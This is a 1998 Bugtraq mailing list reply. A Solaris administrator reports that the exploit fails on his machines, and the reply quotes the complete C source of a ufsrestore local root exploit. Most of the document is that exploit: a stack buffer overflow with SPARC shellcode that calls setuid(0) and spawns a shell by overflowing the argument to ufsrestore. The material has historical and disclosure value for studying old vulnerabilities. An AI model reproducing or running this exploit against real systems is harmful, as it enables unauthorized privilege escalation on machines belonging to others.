[6957] in bugtraq
Re: ufsrestore sparc exploit
daemon@ATHENA.MIT.EDU (Matt Glaves)
Fri Jun 12 15:16:04 1998
Date: Thu, 11 Jun 1998 22:25:42 -0400
Reply-To: Matt Glaves <glaves@CS.ODU.EDU>
From: Matt Glaves <glaves@CS.ODU.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.OSF.3.91.980611174035.14938D-100000@osprey.unf.edu>
No luck on 2.5, 2.5.1 or 2.6 machines here.
Matt Glaves System Administrator
glaves@cs.odu.edu Old Dominion University
http://www.cs.odu.edu/~glaves Computer Science Department
On Thu, 11 Jun 1998, John McDonald wrote:
> well.. here is the source. :>
>
> I have not checked it on a patched machine.. guess I stumbled onto a
> different hole when playing with ufsrestore.
>
> humble
>
> // ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit
> // by humble
> // thanks to plaguez for help
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <unistd.h>
>
> #define BUF_LENGTH 300
> #define EXTRA 100
> #define STACK_OFFSET -600
> #define SPARC_NOP 0xac15a16e
>
> // normal shell code cept I added a bunch of sll's and add's
> // to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)
> // I don't know sparc assembly so this might be dumb :P
>
> // also added code to do seteuid(0); setuid(0); from erik's buffer
> // overrun page
>
> u_char sparc_shellcode[] =
> "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08"
> "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
> "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
> "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01"
> "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
> "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01"
> "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01"
> "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a"
> "\x90\x0b\x80\x0e"
> "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0"
> "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
> "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08";
>
> u_long get_sp(void)
> {
> __asm__("mov %sp,%i0 \n");
> }
>
> void main(int argc, char *argv[])
> {
> char buf[BUF_LENGTH + EXTRA + 8];
> long targ_addr;
> u_long *long_p;
> u_char *char_p;
> int i, code_length = strlen(sparc_shellcode),dso=0,a=0;
>
> if(argc > 1) dso=atoi(argv[1]);
>
> long_p =(u_long *) buf ;
> targ_addr = get_sp() - STACK_OFFSET - dso;
> for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
> *long_p++ = SPARC_NOP;
>
> char_p = (u_char *) long_p;
>
> for (i = 0; i < code_length; i++)
> *char_p++ = sparc_shellcode[i];
>
> long_p = (u_long *) char_p;
>
> for (i = 0; i < EXTRA / sizeof(u_long); i++)
> *long_p++ =targ_addr;
>
> printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
> targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
> printf("hit ctrl-c and then type y\n");
> execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);
> perror("execl failed");
> }
>
